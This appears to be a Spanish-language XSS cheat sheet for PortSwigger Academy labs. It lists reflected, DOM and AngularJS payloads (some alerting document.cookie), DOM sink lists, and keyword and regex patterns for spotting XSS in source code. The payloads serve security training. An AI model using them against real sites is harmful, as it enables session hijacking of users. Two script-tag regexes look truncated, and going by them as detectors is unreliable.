PortSwigger XSS Reflected Stored DOM

XSS — Cross-Site Scripting

Payloads, técnicas de bypass de WAF, DOM sinks y cheat sheet completo de XSS.

Reflected XSS — Payloads comunes

HTML/JS

<script>alert(1)</script>
<script>print(1)</script>

" autofocus onfocus=alert(1) x="

<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>

<a href="javascript:alert(1)">Click me</a>

Reflected XSS — Most tags and attributes blocked

iframe onresize

<iframe src="https://LAB.web-security-academy.net/?search=%3Cbody%20onresize=alert(document.cookie)%3E"
        onload=this.style.width='100px'>

Reflected XSS — All tags blocked except custom ones

Custom tag + tabindex focus

<script>
location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

DOM XSS — AngularJS template injection

Angular sandbox escape

{{$on.constructor('alert(1)')()}}

Palabras clave para detectar XSS en código fuente

eval()

document.cookie

alert()

innerHTML

onmouseover

onload

onerror

src

href

javascript:

script

img

svg

Regex para encontrar posibles puntos de ataque

1. Etiquetas <script>

/)<[^<]*)*<\/script>/gi
/]>([\s\S]*?)<\/script>/gi

2. Atributos de eventos HTML

/(on\w+)=["']([^"']+)["']/gi
/(on\w+)\s*=\s*([^>]+)/gi

3. URLs JavaScript en atributos

/javascript:(?:(?![\s"'])[^:;"'])*(?:(?:"|')(?:(?![;"']).)*|[^;"'\s])?/gi

Cheat Sheet

Basic Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Event Handlers

<img src="#" onclick=alert(1)>
<input onmouseover=alert(1)>
<a href="javascript:alert(1)">x</a>

DOM-based

http://x.com/page#<img src=x onerror=alert(1)>
http://x.com/?lang=<img src=x onerror=alert(1)>

DOM-XSS Sinks

Vanilla DOM sinks

document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent

jQuery DOM sinks

add() / after() / append() / animate()
insertAfter() / insertBefore() / before()
html() / prepend() / replaceAll()
replaceWith() / wrap() / wrapInner()
wrapAll() / has() / constructor()
init() / index()
jQuery.parseHTML() / $.parseHTML()

XXE Injection

Módulo relacionado: inyección de entidades XML externas para lectura de archivos, SSRF y exfiltración.

Ver XXE Injection →